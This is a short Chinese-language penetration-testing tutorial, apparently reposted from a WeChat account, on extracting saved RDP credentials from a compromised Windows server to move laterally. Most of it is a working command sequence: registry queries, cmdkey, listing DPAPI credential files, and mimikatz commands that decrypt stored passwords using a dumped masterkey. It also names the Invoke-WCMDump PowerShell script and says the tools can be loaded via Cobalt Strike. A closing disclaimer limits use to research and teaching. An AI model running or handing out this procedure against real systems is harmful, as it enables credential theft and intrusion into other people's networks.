当我们获取一台windows服务器,可以尝试获取本地远程连接的信息
甚至可以拿到明文密码,横向移动。
通过rdp服务登录远程桌面时,如果选择了保存凭证
会在本地生成一个凭证文件,我们只要破解这个凭证里面的数据即可获得明文密码
通过
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
查询注册表信息,获取rdp的计算机名,ip信息
有可能这台机器保存登录其他机器rdp
#查看mstsc的连接纪录
cmdkey /list
#查找本地的Credentials:
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
这里如果是桌面去查找,要开启显示隐藏文件
猕猴桃获取密码
如果存在,可以使用mimikatz
记录这个值
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials9D26EE720EDC4D95AF94298895D92FA9"
执行找到guidMasterKey值对应的guid下的MasterKer值
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" >1.txt
mimikatz.exe "dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials9D26EE720EDC4D95AF94298895D92FA9 /masterkey:9d112cafdfc47142e80b38fecc3c9738ff844db85ce15e2e035f21c7727a76334c725a16942df1769a0ece1e68c7aeb6a484a877d538494201029be8d7914213"
破解密码,登录机器
network password
下载地址:https://www.nirsoft.net/utils/network_password_recovery.html
通过powershell脚本
下载地址:https://github.com/peewpw/Invoke-WCMDump
Import-Module .Invoke-WCMDump.ps1
Invoke-WCMDump
也可以直接cs加载powershell使用
原文始发于微信公众号(qin9):内网渗透-RDP凭据获取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论